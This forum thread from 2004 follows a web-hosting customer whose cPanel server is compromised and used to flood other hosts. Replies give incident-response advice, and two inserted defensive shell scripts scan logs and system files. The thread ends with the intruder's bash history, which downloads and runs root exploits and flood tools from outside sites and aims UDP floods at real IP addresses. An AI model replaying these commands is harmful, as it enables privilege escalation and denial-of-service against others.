LinuxQuestions.org
Old 07-16-2004, 05:19 AM   #1
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Rep: Reputation: 0
Server Attack...every day, help :(


Hello,
every day somebody attacks my server, puts some files in my /var/tmp and /tmp/ directories and executes them (on my server I have cPanel/WHM). I searched the logs (usr/local/apache/domlogs and var/log) for how he does that but I can't find it; the only thing I found today in domlogs is this code. What is this, can he do that with this code, and how can I protect my server if he does that with this code:
66.79.55.12 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\x
. . . etc.
much more... and at the end of this code is this:
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-"
"-"

Please somebody help me...this is a big problem for me.
Thanks!
 
Old 07-16-2004, 06:23 AM   #2
ppuru
Senior Member
 
Registered: Mar 2003
Location: Beautiful BC
Distribution: RedHat & clones, Slackware, SuSE, OpenBSD
Posts: 1,791

Rep: Reputation: 47
The best thing you can do is back up your important config files and webpages, format, and reinstall the OS.

Read through the security refs on this forum to harden your OS. Ensure you connect your system to the net only after it is properly patched up and the firewall has opened only the ports that you need for your Internet presence.
 
Old 07-16-2004, 06:43 AM   #3
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0

But I checked my system with chkrootkit, rkhunter and with Panda free antivirus software and I didn't find trojans, viruses...nothing...

Some other way?

Thanks
 
Old 07-16-2004, 07:33 AM   #4
stickman
Senior Member
 
Registered: Sep 2002
Location: Nashville, TN
Posts: 1,552

Rep: Reputation: 53
Looks like the Apache log entry is an IIS WebDAV exploit, and it's probably not related to the files in /var/tmp or /tmp. What are the files in those directories? I wouldn't go so far as re-installing unless you know that you have a problem that can't be easily undone.
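To see what stickman's identification means in practice, here is an added example (not code from the thread or from any poster) that scans an Apache access log for entries shaped like the one quoted above: a non-standard request method and a request line packed with \xNN escapes. It prints the status code as well, because that is what tells you how Apache handled the request; the sample log lines are constructed and use the 192.0.2.0/24 documentation range.

```shell
#!/bin/sh
# Added example, not code from the thread: flag Apache access-log entries that
# look like the IIS WebDAV probe quoted above. Two signals: a request method
# outside the usual GET/POST/HEAD set, and a request line packed with \xNN
# escapes (the \x90 NOP sled and \x02\xb1 filler). The status code is printed
# because it tells you how Apache handled it: 414 means the request line was
# too long and was rejected before any handler saw it.
flag_webdav_probes() {            # $1 = access log (common or combined format)
    awk '{
        ip = $1
        method = $6; sub(/^"/, "", method)          # strip the opening quote
        status = "?"
        if (match($0, /" [0-9][0-9][0-9] /))        # closing quote, then status
            status = substr($0, RSTART + 2, 3)
        escapes = gsub(/\\x[0-9a-fA-F][0-9a-fA-F]/, "&")   # count \xNN, keep text
        reason = ""
        if (method !~ /^(GET|POST|HEAD)$/) reason = "method=" method
        if (escapes >= 8) reason = reason (reason != "" ? " " : "") "hex_escapes=" escapes
        if (reason != "") print ip, status, reason
    }' "$1"
}

# Constructed sample log (made up for this example; 192.0.2.0/24 is a
# documentation range). The first line mimics the entry in the post above.
log=$(mktemp)
trap 'rm -f "$log"' EXIT
cat > "$log" <<'EOF'
192.0.2.7 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x90\x90\x90\x90" 414 354 "-" "-"
192.0.2.8 - - [16/Jul/2004:07:30:01 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0 (compatible)"
192.0.2.9 - - [16/Jul/2004:07:31:12 +0200] "PROPFIND /webdav/ HTTP/1.1" 405 0 "-" "-"
EOF

flag_webdav_probes "$log"
# Prints:
# 192.0.2.7 414 method=SEARCH hex_escapes=11
# 192.0.2.9 405 method=PROPFIND
```

A flagged line with a 414 or 405 status was refused by Apache; the lines worth chasing are flagged requests that got a 200.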
 
Old 07-16-2004, 07:55 AM   #5
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
No, I don't use IIS, on my server I use Linux/Apache....
Every day he puts and executes in var/tmp the files "vadimI", "f3", "sh" and some more names...I have a copy of those files on my HD...those files use much CPU...
Also, he creates directories in var/tmp with names like "....", ".c", ".x"....

But I can't find those files in the logs; how does he run them and copy them to that location....?
 
Old 07-16-2004, 09:25 AM   #6
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
First, you should definitely disconnect the system from the internet.

As stickman pointed out, the buffer overflow you've posted is a common IIS WebDAV exploit and is likely unrelated to the files. In fact, if the files are appearing every day, it sounds like they're being created locally by a cron job, or by something in the init process if you're rebooting daily, so definitely take a look at cron and crontab. You should probably also take a look at the /etc/passwd file and see if you have any odd users, and especially look for users other than root with a UID of 0. Try searching for strange SUID files (find / -perm -4000 -print) and SGID files (find / -perm -2000 -print) as well.

One thing to keep in mind is that rootkits are really only tools used primarily to hide the presence of a cracker. So it's entirely possible to crack a system and never use a rootkit at all; it just makes the job of hiding a little easier.

Even if you do determine that the system has been cracked, remove the files and prevent their re-creation, you will need to re-install from trusted media. If the system's security has been compromised, it's extremely difficult to be sure that no other files are lurking somewhere else in the file system. When you re-install, look into running a file integrity IDS like Tripwire, AIDE, Samhain, etc. With one of these installed, you'll more than likely be able to determine what files have been added to the system, or if any critical files have been altered, using a single command.

Last edited by Capt_Caveman; 07-16-2004 at 10:23 AM.
 
Old 07-16-2004, 12:40 PM   #7
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0

I think that I found where the problem is!
In the "/etc/cron.daily" dir I found these files:
00-logwatch@
logrotate*
rpm*
0anacron*
makewhatis.cron*
slocate.cron*
tmpwatch*

Is this normal? Do you have tmpwatch* ?
When I edit that file I find this:
/usr/sbin/tmpwatch 240 /tmp
/usr/sbin/tmpwatch 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
        /usr/sbin/tmpwatch -f 720 $d
    fi
done

When I search on Google for "tmpwatch" the first result is:
"tmpwatch has a local denial of service and root exploit"

Is this the problem?
What now?
 
Old 07-17-2004, 01:14 AM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
The contents of cron.daily are pretty normal, except the * and @ characters after the filenames; what Linux distro are you using? Also, don't forget to check crontab as well.

Tmpwatch is a normal Linux application which is used to blow away tmp files that aren't being used. For more info, check out the tmpwatch man page.

Have you looked into any of the other advice I've given?
 
Old 07-17-2004, 01:45 PM   #9
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0

Today he added and ran a new file in var/tmp, "udp.pl"!
Also, this uses much CPU; when I click on "CPU/Memory/MySQL Usage" in WHM I see this:
Top Process %CPU 89.0 /usr/bin/perl ./udp.pl 200.222.175.87 139 1

Here is a copy of the header (udp.pl):
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

Also, how does he run this script? For other scripts like ikonboard I see this for the same user:
Top Process %CPU 67.0 /usr/bin/perl ikonboard.cgi

no "./ikonboard.cgi"!!!

Here is the crontab -e output:
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
31 5 * * * /scripts/upcp
*/15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
0 6 * * * /scripts/cleanmsglog > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim callout > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim reject > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim wait-remote_smtp > /dev/null 2>$
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1

etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash

and all users are "username:x:3xxxx:3xxxx::/home"
(xxxx is some number)

find / -perm -4000 -print:
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/cgi-sys/scgiwrap
/usr/sbin/exim
/usr/sbin/traceroute
/usr/sbin/suexec
/bin/su
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/24270/fd/4: No such file or directory
find: /proc/24586/fd: No such file or directory

find / -perm -2000 -print:
/var/cpanel/users
/usr/bin/wall
/usr/bin/slocate
/usr/local/cpanel/3rdparty/mailman
/usr/local/cpanel/3rdparty/mailman/Mailman
/usr/local/cpanel/3rdparty/mailman/Mailman/Archiver
/usr/local/cpanel/3rdparty/mailman/Mailman/Bouncers
/usr/local/cpanel/3rdparty/mailman/Mailman/Cgi
/usr/local/cpanel/3rdparty/mailman/Mailman/Handlers
/usr/local/cpanel/3rdparty/mailman/Mailman/Logging
/usr/local/cpanel/3rdparty/mailman/Mailman/Queue
/usr/local/cpanel/3rdparty/mailman/Mailman/MTA
/usr/local/cpanel/3rdparty/mailman/Mailman/Gui
/usr/local/cpanel/3rdparty/mailman/Mailman/Commands
/usr/local/cpanel/3rdparty/mailman/archives
/usr/local/cpanel/3rdparty/mailman/archives/private
/usr/local/cpanel/3rdparty/mailman/archives/private/aa_cpanel3.darkorb.net.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman
/usr/local/cpanel/3rdparty/mailman/archives/public
/usr/local/cpanel/3rdparty/mailman/bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/handle_opts
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
/usr/local/cpanel/3rdparty/mailman/cgi-bin/options
/usr/local/cpanel/3rdparty/mailman/cgi-bin/private
/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
/usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
/usr/local/cpanel/3rdparty/mailman/cron
/usr/local/cpanel/3rdparty/mailman/data
/usr/local/cpanel/3rdparty/mailman/filters
/usr/local/cpanel/3rdparty/mailman/icons
/usr/local/cpanel/3rdparty/mailman/lists
/usr/local/cpanel/3rdparty/mailman/lists/mailman
/usr/local/cpanel/3rdparty/mailman/locks
/usr/local/cpanel/3rdparty/mailman/logs
/usr/local/cpanel/3rdparty/mailman/mail
/usr/local/cpanel/3rdparty/mailman/mail/mailman
/usr/local/cpanel/3rdparty/mailman/qfiles
/usr/local/cpanel/3rdparty/mailman/qfiles/virgin
/usr/local/cpanel/3rdparty/mailman/qfiles/bounces
/usr/local/cpanel/3rdparty/mailman/qfiles/shunt
/usr/local/cpanel/3rdparty/mailman/qfiles/commands
/usr/local/cpanel/3rdparty/mailman/qfiles/archive
/usr/local/cpanel/3rdparty/mailman/qfiles/in
/usr/local/cpanel/3rdparty/mailman/qfiles/out
/usr/local/cpanel/3rdparty/mailman/qfiles/news
/usr/local/cpanel/3rdparty/mailman/qfiles/retry
/usr/local/cpanel/3rdparty/mailman/scripts
/usr/local/cpanel/3rdparty/mailman/spam
/usr/local/cpanel/3rdparty/mailman/templates
/usr/local/cpanel/3rdparty/mailman/templates/big5
/usr/local/cpanel/3rdparty/mailman/templates/cs
/usr/local/cpanel/3rdparty/mailman/templates/de
/usr/local/cpanel/3rdparty/mailman/templates/en
/usr/local/cpanel/3rdparty/mailman/templates/es
/usr/local/cpanel/3rdparty/mailman/templates/et
/usr/local/cpanel/3rdparty/mailman/templates/eu
/usr/local/cpanel/3rdparty/mailman/templates/fi
/usr/local/cpanel/3rdparty/mailman/templates/fr
/usr/local/cpanel/3rdparty/mailman/templates/gb
/usr/local/cpanel/3rdparty/mailman/templates/hu
/usr/local/cpanel/3rdparty/mailman/templates/it
/usr/local/cpanel/3rdparty/mailman/templates/ja
/usr/local/cpanel/3rdparty/mailman/templates/ko
/usr/local/cpanel/3rdparty/mailman/templates/lt
/usr/local/cpanel/3rdparty/mailman/templates/nl
/usr/local/cpanel/3rdparty/mailman/templates/no
/usr/local/cpanel/3rdparty/mailman/templates/pl
/usr/local/cpanel/3rdparty/mailman/templates/pt
/usr/local/cpanel/3rdparty/mailman/templates/pt_BR
/usr/local/cpanel/3rdparty/mailman/templates/ru
/usr/local/cpanel/3rdparty/mailman/templates/sr
/usr/local/cpanel/3rdparty/mailman/templates/sv
/usr/local/cpanel/3rdparty/mailman/templates/uk
/usr/local/cpanel/3rdparty/mailman/templates/ca
/usr/local/cpanel/3rdparty/mailman/templates/hr
/usr/local/cpanel/3rdparty/mailman/templates/ro
/usr/local/cpanel/3rdparty/mailman/templates/sl
/usr/local/cpanel/3rdparty/mailman/templates/tr
/usr/local/cpanel/3rdparty/mailman/pythonlib
/usr/local/cpanel/3rdparty/mailman/pythonlib/email
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/python
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/aliases
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2/site-packages
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/python
/usr/local/cpanel/3rdparty/mailman/messages
/usr/local/cpanel/3rdparty/mailman/messages/cs
/usr/local/cpanel/3rdparty/mailman/messages/cs/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/da
/usr/local/cpanel/3rdparty/mailman/messages/da/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/de
/usr/local/cpanel/3rdparty/mailman/messages/de/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/es
/usr/local/cpanel/3rdparty/mailman/messages/es/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/et
/usr/local/cpanel/3rdparty/mailman/messages/et/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/eu
/usr/local/cpanel/3rdparty/mailman/messages/eu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fi
/usr/local/cpanel/3rdparty/mailman/messages/fi/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fr
/usr/local/cpanel/3rdparty/mailman/messages/fr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hu
/usr/local/cpanel/3rdparty/mailman/messages/hu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/it
/usr/local/cpanel/3rdparty/mailman/messages/it/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ja
/usr/local/cpanel/3rdparty/mailman/messages/ja/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ko
/usr/local/cpanel/3rdparty/mailman/messages/ko/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/lt
/usr/local/cpanel/3rdparty/mailman/messages/lt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/nl
/usr/local/cpanel/3rdparty/mailman/messages/nl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/no
/usr/local/cpanel/3rdparty/mailman/messages/no/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pl
/usr/local/cpanel/3rdparty/mailman/messages/pl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt
/usr/local/cpanel/3rdparty/mailman/messages/pt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ru
/usr/local/cpanel/3rdparty/mailman/messages/ru/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sr
/usr/local/cpanel/3rdparty/mailman/messages/sr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sv
/usr/local/cpanel/3rdparty/mailman/messages/sv/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/uk
/usr/local/cpanel/3rdparty/mailman/messages/uk/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ca
/usr/local/cpanel/3rdparty/mailman/messages/ca/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hr
/usr/local/cpanel/3rdparty/mailman/messages/hr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ro
/usr/local/cpanel/3rdparty/mailman/messages/ro/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sl
/usr/local/cpanel/3rdparty/mailman/messages/sl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/tr
/usr/local/cpanel/3rdparty/mailman/messages/tr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/tests
/usr/local/cpanel/3rdparty/mailman/tests/bounces
/usr/local/cpanel/3rdparty/mailman/tests/msgs
/usr/local/cpanel/3rdparty/mailman/suspended.lists
/usr/local/cpanel/3rdparty/phpMyAdmin
/usr/local/cpanel/3rdparty/phpMyAdmin/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/images
/usr/local/cpanel/3rdparty/phpMyAdmin/images/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/lang
/usr/local/cpanel/3rdparty/phpMyAdmin/lang/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts/CVS
/usr/sbin/sendmail
/usr/sbin/utempter
/etc/proftpd
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/25154/fd/4: No such file or directory


That is all...is anything bad there?

Thank you very much...
 
Old 07-17-2004, 02:44 PM   #10
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Well, it's pretty clear that the system has been cracked. vadimI and udp.pl are flooders used in DoS attacks. Since new files were uploaded, I'm guessing that you have not taken the system offline. Let me be clear about this:

Your system is being used to attack other computers. You MUST take it offline NOW and leave it offline until you are sure that it is clean!

In fact, if you look at the process you've listed, you can see the IP address of the system you're being used to attack.
 
Old 07-17-2004, 03:08 PM   #11
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Get a listing of all currently running processes and check the integrity of RPMs with rpm -Va. Once you've got the system offline, you can either remove the compromised system's hard drive, replace it with a new one, then format and re-install from trusted media, or you can make an image of the drive using something like dd, then wipe the compromised drive by completely re-formatting and re-installing from trusted media (not from a backup). You can then get the system back online. I would HIGHLY recommend you spend some time properly securing the system before putting it back online, otherwise you'll probably be doing this again sometime soon.

If you want to do any kind of further analysis, boot your system with a CD-ROM based Linux distro like Knoppix or FIRE and then mount the compromised HD read-only. You can then take a look at the filesystem, system logs, and root's bash_history. You might also want to take a look at the ikonboard.cgi file (ikonboard is a bulletin board app), especially if you are not running ikonboard. Btw, you said both ikonboard and udp.pl were running under the same user, but you never said what user that is.
 
Old 07-17-2004, 03:44 PM   #12
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Big problem, that is a BIG PROBLEEEEM....offline, f***...

Yes...the user...he runs it every time with the same username (one site) and every time in "var/tmp"; before I ran "scripts/securetmp" he ran it in "tmp"!!!
But THAT SITE IS MY SITE!! Yes, I changed the password, that doesn't help!
In the logs for that site I can't find anything!

Also, I can't remove the HD, the server is not mine, I pay a company for that server...
But I have many sites on that server....and some of those sites are not mine!
How long must the server be offline, and can I restore all accounts and data for all sites?

This can be a big problem, somebody could think that I attacked those servers...and I could lose this server from this company!

Also, yes, I use the ikonboard board!

Last edited by xmanxl; 07-17-2004 at 03:48 PM.
 
Old 07-17-2004, 04:23 PM   #13
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Have you tried looking at the user's bash history or just removing the user entirely? Have you contacted the user and asked him wtf he's doing?

FWIW, /var/tmp is often writable by normal users (check /var/tmp permissions) and if you allow normal users to have access to /usr/sbin/perl, they'll be able to run that udp.pl script without needing root access.

Last edited by Capt_Caveman; 07-17-2004 at 04:25 PM.
 
Old 07-17-2004, 06:22 PM   #14
sh1ft
Member
 
Registered: Feb 2004
Location: Ottawa, Ontario, Can
Distribution: Slackware, ubuntu
Posts: 391

Rep: Reputation: 31
Let this be a lesson to people to put your /tmp and /var directories on a separate partition and add the noexec flag in fstab. That will stop a heck of a lot of script kiddies in their tracks.
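The checks suggested across this thread (Capt_Caveman's UID-0 accounts and SUID/SGID listings, sh1ft's noexec mounts, and the "perl ./udp.pl" process pattern from the WHM output) can be scripted so they run the same way every time. This is an added example, not code from the thread or from any poster; every helper reads a file so it can be pointed at the live system or at copies taken from a disk mounted read-only, and the passwd, mounts, ps and baseline data below are constructed (192.0.2.0/24 is a documentation range).

```shell
#!/bin/sh
# Added example, not code from the thread or any poster: small helpers for the
# checks Capt_Caveman lists (UID-0 accounts, SUID/SGID files) plus the noexec
# check sh1ft recommends and the "interpreter running a script out of a temp
# dir" pattern seen in the WHM process list. Each helper reads a file, so it
# works on the live system (/etc/passwd, /proc/mounts, ps output) or on copies
# taken from the disk mounted read-only from a rescue CD.

# Login names with UID 0 other than root. Any output is a red flag.
uid0_nonroot() {                  # $1 = passwd-format file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Exit 0 if the mount point is mounted with noexec; input is fstab/mounts
# format (device mountpoint fstype options ...).
mount_has_noexec() {              # $1 = mounts-format file, $2 = mount point
    awk -v mp="$2" '$2 == mp && $4 ~ /(^|,)noexec(,|$)/ { found = 1 }
                    END { exit found ? 0 : 1 }' "$1"
}

# Processes whose arguments name a program under a temp dir or a bare ./name,
# the shape of "/usr/bin/perl ./udp.pl" above. A relative path only says the
# process was started from its cwd; confirm with readlink /proc/PID/cwd.
tmp_script_processes() {          # $1 = output of: ps -eo user,pid,pcpu,args
    awk 'NR > 1 {
        for (i = 4; i <= NF; i++)
            if ($i ~ "^\\./|^/tmp/|^/var/tmp/") { print $1, $2, $i; break }
    }' "$1"
}

# SUID/SGID paths present now but absent from a baseline saved after a clean
# install (baseline: find / -perm -4000 -o -perm -2000 2>/dev/null | sort).
new_setid_files() {               # $1 = baseline listing, $2 = current listing
    grep -vxF -f "$1" "$2" || true   # grep exits 1 when nothing is new
}

# --- Constructed sample data (made up for this example) ---
work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT
cat > "$work/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
toor:x:0:0::/root:/bin/bash
EOF
cat > "$work/mounts" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,nosuid,noexec,nodev 0 0
/dev/sda4 /var/tmp ext3 rw 0 0
EOF
cat > "$work/ps" <<'EOF'
USER PID %CPU COMMAND
root 1 0.0 init
mysql 812 1.2 /usr/libexec/mysqld --basedir=/usr
site1 4112 89.0 /usr/bin/perl ./udp.pl 192.0.2.10 139 1
site1 4120 67.0 /usr/bin/perl ikonboard.cgi
EOF
printf '%s\n' /bin/su /usr/bin/passwd /usr/sbin/exim > "$work/setid.baseline"
printf '%s\n' /bin/su /usr/bin/passwd /usr/sbin/exim /var/tmp/..../sh > "$work/setid.now"

echo "UID 0 accounts other than root:"; uid0_nonroot "$work/passwd"
for mp in /tmp /var/tmp; do
    if mount_has_noexec "$work/mounts" "$mp"; then echo "$mp: noexec set"
    else echo "$mp: noexec MISSING"; fi
done
echo "processes started out of temp dirs:"; tmp_script_processes "$work/ps"
echo "setuid/setgid files not in baseline:"; new_setid_files "$work/setid.baseline" "$work/setid.now"
```

On a box you suspect is compromised, run the helpers against copies of the files taken from the disk mounted read-only, since binaries on the live system (awk, grep, ps) may themselves have been replaced.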
 
Old 07-17-2004, 09:25 PM   #15
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Yes, yes, yes.....I found it, I found it......in ".bash_history" for this account I found this:
kill
29515 kill 29515
kill 29515
ls
ls
cd /tmp
ls
rm *
ls
cd /var/tmp
ls
uanem -a
uname -a
wget http://www.kpteam.org/xpl/w00t.zip
unzip http://www.kpteam.org/xpl/w00t.zip
unzip w00t.zip
chmod +x w00t
./w00t
id
wget http://www.rootthief.com/binarys/mremap_pte
chmod +x mremap_pte
./mremap_pte
id
wget http://www.rootthief.com/binarys/NmapYa
chmod +x NmapYa
./NmapYa
id
nmap
./ NmapYa
wget http://www.rootthief.com/binarys/cvs
chmod +x cvs
./cvs
./cvs
./cvs forum.aboutpc.net
ls
rm *
ls
wget http://www.rootthief.com/binarys/ptrace
chmod +x ptrace
./ptrace
id
./ptrace; id
ls
ps
kill 23425
rm *
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
rm vadimI.zip
chmod +x vadimI
./vadimI
./vadimI 200.214.14.71 80 200.214.14.7
ps
kill 27391
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.164.65.34 80 200.164.65.3
./f3 200.216.161.140 10000 200
ps
kill 31240
ps
ps
ps
ps
ps
ps
kill -9 31239
kill -9 31240
ps
./f3 161.24.72.80
./f3 161.24.72.80 1000 200
id
ps
./vadimI 200.216.161.140 59 200.216.161.14
w
w
ls
id
uname -a
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/PT
chmod +x PT
./PT
id
rm PT
exit
wget http://www.portalsecurityall.hpg.ig....3.10ALPHA7.tgz
ls
rm -rf nmap-3.10ALPHA7.tgz
ls
wget http://www.malukinhow.com/mirc615.exe
ls
rm -rf mirc615.exe
ls
id
ls
ps
./f3
w
ls
./vadimI 200.165.49.5 80 200.165.49.1
ps
ls
./f3
./f3 200.247.39.196
./f3 200.247.39.196 1000 600
id
./f3 200.247.39.196 1000 600
ls
ps
kill 18353
kill 18354
kill 19787
ls
ps
kill -9 18354
kill -9 18353
ps
./f3 200.247.39.196 1000 600
ps
kill -9 21132
ps
./f3 66.90.87.13 1000 600
ps
kill -9 21911
./vadimI 66.90.87.13 1286 66.90.87.1
w
ls
ls -a
ps
exit
ls
ls -a
mkdir ....
cd ....
ls
ls
pwd
w
wget http://www.aloysio.hpg.ig.com.br/f3
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
ls
rm -rf vadimI.zip
id
./f3
./f3 200.154.201.39 1000 200
ls
ls -a
cd ....
./f3 200.154.201.39 1000 200
id
ps
